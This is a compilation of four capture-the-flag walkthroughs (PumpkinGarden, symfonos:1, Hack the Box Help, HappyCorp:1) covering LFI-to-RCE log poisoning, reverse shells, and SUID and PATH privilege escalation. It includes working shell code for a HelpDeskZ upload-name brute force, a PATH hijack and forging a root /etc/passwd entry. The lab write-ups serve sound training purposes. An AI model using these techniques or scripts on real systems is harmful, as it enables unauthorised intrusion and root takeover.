PumpkinGarden: Vulnhub Walkthrough

Today we are going to solve another CTF challenge, Mission Pumpkin (PumpkinGarden). Credit for the VM goes to Jayanth, who designed it for people who are new to penetration testing. The mission is to read the PumpkinGarden_key file stored in the root account. So, let's proceed to solve Mission Pumpkin.

You can download this VM from vulnhub.com: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/

Security Level: Beginner

Penetration Methodology:

Scanning

  • Nmap

Enumeration

  • Anonymous FTP login
  • Web Directory Search

Exploiting

  • SSH connect

Privilege Escalation

Scanning

Let's start with scanning, using Nmap to find out which ports are open.

Port 21 (FTP) is open and allows anonymous login. HTTP is running on the non-standard port 1515 and OpenSSH on port 3535. With that, we move on to enumeration.

Enumeration

First, we connect over FTP using anonymous as both the username and the password. There we find note.txt and download it to our machine.

Since Apache was listening on port 1515, we open it in the browser, but the page shows nothing interesting.

Next we run dirb for web directory enumeration and find the /img directory.

Inside the /img directory we find a file named hidden_secrets.

Opening it gives us the next clue, a secret key.

The key is base64-encoded (encoded, not encrypted; anyone can reverse it), so we decode it to get the clue.

The decoded text looks like a credential pair: username scarecrow, password [email protected]$y.

Exploiting

Now we try SSH on port 3535 with the credentials found above. After logging in as scarecrow we find another note.txt, and opening it gives the next clue, a password. To work out which account it belongs to, we check the list of users in /etc/passwd.

Among the users is goblin. Switching to the goblin user with the password Y0n$M4sv3D1t succeeds.

As goblin we find another note containing an Exploit-DB link, as shown in the image at the bottom.

Following the link, we download the bash script it points to, which describes the steps for gaining root.

Running the commands from that script gives us a root shell. In root's home we find PumpkinGarden_key, which means the CTF is solved.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

Symfonos:1 Vulnhub Walkthrough

This is another post on a Vulnhub CTF, symfonos:1 by Zayotic. It is a boot-to-root challenge built for VMware where you have to find the flags to finish the task set by the author.

You can download it from here: https://www.vulnhub.com/entry/symfonos-1,322/

Level: Beginner to Intermediate

Penetrating Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • SMB Shares folder
  • Wpscan

Exploiting

  • Exploiting a WordPress plugin LFI
  • LFI to RCE via SMTP log poisoning

Privilege Escalation

  • PATH Variable
  • Capture the flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP 192.168.0.16. Now, let’s scan the services and ports via nmap.

Enumeration

After scanning, we move on to SMB enumeration with enum4linux. It reveals a user account, helios, and two shares, /anonymous and /helios.

So we connect to the /anonymous share over SMB.

In this share I found a text file, attention.txt, shown below. It hints at some user passwords, highlighted in the image. With luck one of them will open the /helios share.

Next I access /helios with "qwerty" as the password and find two files, research.txt and todo.txt. research.txt is of little use, but todo.txt mentions /h3l105, which could be a web file or directory.

Browsing to /h3l105 shows a WordPress site.

Then I add the site's hostname to /etc/hosts and move on to vulnerability scanning.

We use wpscan to scan the site for vulnerabilities, running the following command:

wpscan reports a plugin with a known Local File Inclusion (LFI) vulnerability for which a public exploit exists.

The linked Exploit-DB entry gives a proof of concept that loads the passwd file:

https://www.exploit-db.com/exploits/40290

The passwd file comes back, which confirms the LFI. Next I try to turn this LFI into remote code execution.

To escalate the LFI to RCE we can poison a file the web server is able to include. The target runs SMTP, so we connect to it with telnet and type the following commands to inject PHP code into the mail log.

Once connected, we send a mail from the command line and place the PHP code in the message body (the DATA section).

This stage is log file poisoning: the PHP code now sits in the mail log, and when the LFI includes that file the PHP interpreter runs it, executing whatever command we pass through the c parameter. Passing id as the command returns the web server's user ID, as the screenshot shows.

This technique is known as SMTP log poisoning, and with command execution in hand we can get a reverse shell from the victim.

Start a netcat listener on Kali, then request the following URL to run a netcat reverse-shell command through the poisoned log:

We get a reverse connection on netcat, as shown in the image below. Next we need to escalate from this low-privilege shell.

After spawning a proper shell, I use find to list SUID binaries and see that the SUID bit is set on /opt/statuscheck.

Running strings on statuscheck shows that it calls curl by bare name rather than by absolute path, and that it errors out when executed. Because the binary relies on the PATH variable to find curl, whichever directory appears first in PATH decides which curl actually runs, and PATH is under the user's control.

To know more, read from here: Linux Privilege Escalation Using PATH Variable

Taking advantage of this, we place a rogue curl that launches /bin/bash in a directory we control, export PATH with that directory in front, and run statuscheck. Since the binary is SUID root, the shell it spawns runs with root privileges.
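To see exactly why the hijack works, here is an added sandbox version of the escalation that runs without the VM (this is not the author's code, and the stand-in script is not the real /opt/statuscheck binary, only a reproduction of its mistake). The rogue curl just records that it ran; on the box it would exec /bin/bash -p instead, and the hardened variant at the end shows the one-line fix, an absolute path.

```shell
# Added example, not the VM's real binary: a sandbox that reproduces the mistake in
# /opt/statuscheck (invoking curl by bare name from a SUID program) so the PATH hijack
# can be watched end to end without a target. A small script stands in for the SUID
# binary; the rogue curl only records that it ran, where on the box it would exec
# /bin/bash -p (the -p keeps the effective uid that SUID granted).

sandbox=$(mktemp -d)

# Stand-in for the vulnerable program: "curl" is resolved through PATH at run time.
cat > "$sandbox/statuscheck" <<'EOF'
#!/bin/sh
curl -I http://127.0.0.1 >/dev/null 2>&1
echo "status check finished"
EOF
chmod +x "$sandbox/statuscheck"

# Attacker-controlled directory holding a "curl" that does something else entirely.
mkdir -p "$sandbox/rogue"
cat > "$sandbox/rogue/curl" <<EOF
#!/bin/sh
echo "rogue curl ran as uid \$(id -u) with args: \$*" > "$sandbox/hijacked"
EOF
chmod +x "$sandbox/rogue/curl"

# Run the victim program with the rogue directory first on PATH.
# Returns 0 when the rogue curl is what executed.
path_hijack() {
  rm -f "$sandbox/hijacked"
  PATH="$sandbox/rogue:$PATH" "$sandbox/statuscheck" >/dev/null
  [ -f "$sandbox/hijacked" ]
}

# Control: with an untouched PATH the rogue copy is never found.
# Returns 0 when the rogue curl did NOT execute.
no_hijack() {
  rm -f "$sandbox/hijacked"
  "$sandbox/statuscheck" >/dev/null 2>&1 || true
  [ ! -f "$sandbox/hijacked" ]
}

# Hardened stand-in: with an absolute path, PATH has no say in which curl runs.
cat > "$sandbox/statuscheck_fixed" <<'EOF'
#!/bin/sh
/usr/bin/curl -I http://127.0.0.1 >/dev/null 2>&1
echo "status check finished"
EOF
chmod +x "$sandbox/statuscheck_fixed"

# Returns 0 when the hardened program ignores the rogue directory on PATH.
fixed_resists_hijack() {
  rm -f "$sandbox/hijacked"
  PATH="$sandbox/rogue:$PATH" "$sandbox/statuscheck_fixed" >/dev/null 2>&1 || true
  [ ! -f "$sandbox/hijacked" ]
}
```

Running path_hijack and then reading $sandbox/hijacked shows the rogue program's view of the call, including the arguments statuscheck meant for the real curl. A SUID binary that must call external programs should either use absolute paths or reset PATH itself before calling them; trusting the caller's environment is the whole bug.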

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

Hack the Box: Help Walkthrough

Help is a recently retired CTF VM on Hack the Box, and the objective remains the same: capture the root flag. Hack the Box offers a wide range of VMs for practice, from beginner to advanced level, and it is a great resource for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are hosted online, they have static IPs. The IP of Help is 10.10.10.121.

Penetration Methodology

Scanning

  • Network Scanning (Nmap)

Enumeration

  • Web Spidering (dirb)

Exploiting

  • Analysing the behaviour of the submit-ticket upload script
  • Uploading a PHP shell and noting the timestamp
  • Computing md5(shellname + timestamp) to recover the stored filename
  • Finding shell on the web server
  • Getting reverse shell through netcat
  • Reading user.txt

Privilege Escalation

  • Finding a kernel exploit for Linux 4.4.0
  • Compiling with GCC and escalating privilege
  • Reading root.txt

Walkthrough

Scanning

Let's start with the most obvious step, an nmap scan for open ports.

Port 22 (SSH) and ports 80 and 3000 (HTTP) are open; the rest are filtered.

We head straight to port 80, but the homepage is completely empty.

Enumeration

Perhaps the web application lives in some other directory, so we run directory enumeration with dirb.

dirb finds two directories: /javascript, which is rarely of any use, and /support, which looks interesting. Opening it in the browser shows a ticketing system.

Exploiting

A ticketing system almost always lets users attach files, so the upload mechanism is a natural place to look for a vulnerability.

We create a sample text file, demo.txt, just to check whether the system actually accepts uploads.

It works: the file is uploaded and we are redirected back to the homepage.

We then dig deeper into the web server but cannot find our text file anywhere. Most likely the PHP backend renamed it according to some rule of its own. If only we could read the code!

Googling HelpDeskZ shows that its source code is on GitHub, which gives us a close look at the upload script.

In controllers/submit_ticket_controller.php we find the code responsible for storing an uploaded file on the server.

There are three interesting noteworthy things here:

  1. The file is written to /support/<upload_dir>/tickets.
  2. There is no check on the type of file being uploaded. The error message is generated after the file is already on disk, so it has no practical effect.
  3. The stored name is md5(<original filename> + epoch timestamp) followed by .php.

We know it is an epoch timestamp because PHP's time() returns the number of seconds since the Unix epoch.

So the plan is clear: upload a PHP reverse shell (we used pentestmonkey's netcat-style PHP reverse shell) and exploit this upload flaw. We could not find our test file a few minutes ago, but now that we know how the stored name is built we can compute the md5 hash ourselves.

For this we need the server's current time, not ours; our clock and time zone may be far off from the server's. So we upload the PHP shell while capturing the request in Firefox's developer tools and read the server time from the response headers.

With the time in GMT, we head to www.epochconverter.com and convert it into an epoch timestamp.

With the timestamp in hand, we can either write a short PHP script that calls md5() or simply run php in interactive mode:

Your timestamp will differ from ours.

With the hash, all that remains is to find the file, start a netcat listener, open the file in the browser and catch the shell.

We know from the code that uploads land in /support/<upload_dir>/tickets, but we did not know the upload directory's name. Our best guess was "uploads", since that folder name appears in the GitHub repository as well.
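The same computation in the shell, as an added example rather than the author's php -a session. Beyond what the post does, it also lists candidates for a window of seconds around the converted time, because the second in which the server's time() ran is rarely the exact second you read from the Date header. The original filename shell.php, the epoch value 1548000000 and the "uploads" directory name are assumptions for illustration, not values from the page.

```shell
# Added example (not the author's own commands): HelpDeskZ's naming scheme,
# md5(<original filename> . time()) followed by .php, reproduced in the shell, plus a
# helper that lists candidate paths for a window of seconds around the time you read
# from the Date header, since the server's time() rarely matches it exactly. Assumed,
# not from the page: the shell was uploaded as shell.php and the converted timestamp
# was 1548000000; the upload directory is "uploads", as the post guessed.

# Name HelpDeskZ stores for an original filename and a given epoch second.
helpdeskz_name() {
  name=$1; epoch=$2
  printf '%s.php' "$(printf '%s%s' "$name" "$epoch" | md5sum | cut -d' ' -f1)"
}

# Candidate paths for every second in [center - window, center + window]; the
# upload request and the server's time() call are not simultaneous, and clocks drift.
helpdeskz_candidates() {
  name=$1; center=$2; window=${3:-5}
  t=$((center - window))
  while [ "$t" -le $((center + window)) ]; do
    printf '/support/uploads/tickets/%s\n' "$(helpdeskz_name "$name" "$t")"
    t=$((t + 1))
  done
}

# Probe the candidates against the target with the netcat listener already running;
# the first 200 instead of 404 is the shell, and requesting it is what triggers it:
#   helpdeskz_candidates shell.php 1548000000 60 | while read -r p; do
#     code=$(curl -s -o /dev/null -w '%{http_code}' "http://10.10.10.121$p")
#     [ "$code" = 200 ] && { echo "found: $p"; break; }
#   done
```

A window of a minute or two in each direction costs a few hundred requests and removes the need to get the timestamp exactly right; if the server clock is badly skewed, widen it rather than guessing.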

We start the netcat listener, request the file and get a shell immediately. We spawn a proper TTY with python and read user.txt in the user's home directory.

Privilege Escalation

For privilege escalation we check the kernel version with uname -a and find that this 4.4.0 kernel has a public exploit. searchsploit gives us a local copy, which makes things easy.

We change to /tmp on the target, fetch the exploit with wget, compile it with gcc and run it.

And that is how we escalate privileges on Help and read the congratulatory message in root.txt under the root directory.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here

Happycorp:1 Vulnhub Walkthrough

This is another post on a Vulnhub CTF, HAPPYCORP:1 by Zayotic. It is a boot-to-root challenge built for VMware where you have to find the flags to finish the task set by the author.

You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/

Penetrating Methodologies

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • NFS share
  • Mount the shared directory
  • Obtain user.txt (1st flag)
  • Obtain the SSH key
  • Crack the SSH key passphrase (John the Ripper)

Exploiting

  • Log in over SSH
  • Escape the restricted shell (rbash)

Privilege Escalation

  • Abusing a SUID binary
  • Obtain flag.txt (2nd flag)

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP 192.168.1.104. Now, let’s scan the services and ports via nmap.

The nmap scan is fruitful: many services are running, such as SSH on port 22 and HTTP on port 80.

Enumeration

As usual we look at HTTP first, browsing to http://192.168.1.104, but find nothing interesting.

NFS was also listening on port 2049, so we check which directories are exported. We install the NFS client package on our machine and list the exports available to mount (showmount -e against the target is the standard way to do this).

/home/karl is exported, and we mount it on our machine as shown below:

I mount /home/karl on /tmp/raj but find nothing readable there; trying to open the .ssh directory gives a permission denied error.

NFS trusts the UID and GID presented by the client, so I create a user "aaru" on my Kali machine in a group with the same GID, 1001, that owns the directory, and can then read the .ssh folder as shown in the steps below (the same approach we used on Lin-Security).

That gives us the first flag, user.txt. We also copy the id_rsa key to our machine with the following command:

In id_rsa.pub and authorized_keys I noticed the comment [email protected], which suggests karl as the SSH username. Logging in as karl with the id_rsa key fails, however, because the key is protected by a passphrase.

So we use ssh2john to convert the key into a format John the Ripper can crack, and run john against it with the rockyou.txt wordlist.

With the passphrase "sheep" recovered, we fix the key's permissions (ssh refuses a private key that is readable by others) and log in as karl, only to land in a restricted shell, rbash.

So I try to get a bash shell directly through ssh, bypassing the restricted login shell, by typing the following:

It works, and we have a proper shell.

Privilege Escalation

Now it is time to escalate to root and finish the task. Using find to look for SUID binaries, I see the SUID bit set on the copy binary, /bin/cp.

If the SUID bit is set on /bin/cp, we can copy any root-owned file and, more importantly, overwrite any file as root. First I look at /etc/passwd, where karl is the last entry as shown in the image below; the plan is to replace this file with a copy that contains an extra user.

Meanwhile, we generate a password hash for pass123 with openssl passwd.

We paste the contents of /etc/passwd into a text editor, append a record for a user "ignite" with UID 0 and GID 0 and the hash in the password field, save it as passwd, and serve it with Python's HTTP server to transfer it to the victim.

In /tmp on the target we download our passwd file and use the SUID cp to overwrite the original /etc/passwd with it, as shown below. Logging in as ignite with pass123 then gives us root.
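The record-forging step as an added example, not the author's exact commands: it builds the passwd line, appends it to a scratch copy and counts the UID 0 accounts before anything is copied over the real file, since a malformed /etc/passwd written with a SUID cp can lock everyone out of the box. The user name ignite and password pass123 follow the post; the sample passwd content is constructed, and the hash is produced with openssl passwd -1 (MD5-crypt, supported by every openssl build) rather than whatever default the author's openssl used.

```shell
# Added example (not the author's exact commands): forge the passwd record and
# verify the resulting file on a scratch copy before the SUID cp ever writes it over
# /etc/passwd. The user name "ignite" and password pass123 follow the post; the
# sample passwd content below is constructed, not the victim's real file.

# crypt(3)-style hash for the new account. -1 selects MD5-crypt, which every
# openssl build supports; use -6 (SHA-512) where available. Falls back to a locked
# field ("*") if openssl is absent so the rest of the demo still runs.
hash_password() {
  if command -v openssl >/dev/null 2>&1; then
    openssl passwd -1 "$1"
  else
    echo '*'
  fi
}

# passwd(5) line for $1: uid 0, gid 0, home /root, bash. Because the second field
# holds a real hash rather than "x", login never consults /etc/shadow for this user.
forge_passwd_record() {
  user=$1; hash=$2
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

# Copy $1 to $2, append the forged record, and print how many uid-0 accounts the
# result has (2 if the original only had root). Check this before overwriting
# /etc/passwd: a malformed file there can lock everyone out of the box.
forge_passwd_file() {
  src=$1; dst=$2; user=$3; hash=$4
  cp "$src" "$dst"
  forge_passwd_record "$user" "$hash" >> "$dst"
  awk -F: '$3 == 0 { n++ } END { print n + 0 }' "$dst"
}

# Constructed stand-in for the victim's /etc/passwd (only the lines that matter here).
work=$(mktemp -d)
printf 'root:x:0:0:root:/root:/bin/bash\nkarl:x:1000:1000:karl:/home/karl:/bin/rbash\n' \
  > "$work/passwd"

# On the target the final steps are:  cp /tmp/passwd /etc/passwd  (the SUID cp), then  su ignite
forge_passwd_file "$work/passwd" "$work/passwd.new" ignite "$(hash_password pass123)" >/dev/null
```

Appending rather than editing existing lines keeps the original accounts intact, so a mistake in the new line costs you one extra user and not the whole system; inspect $work/passwd.new before it is served to the victim.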

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here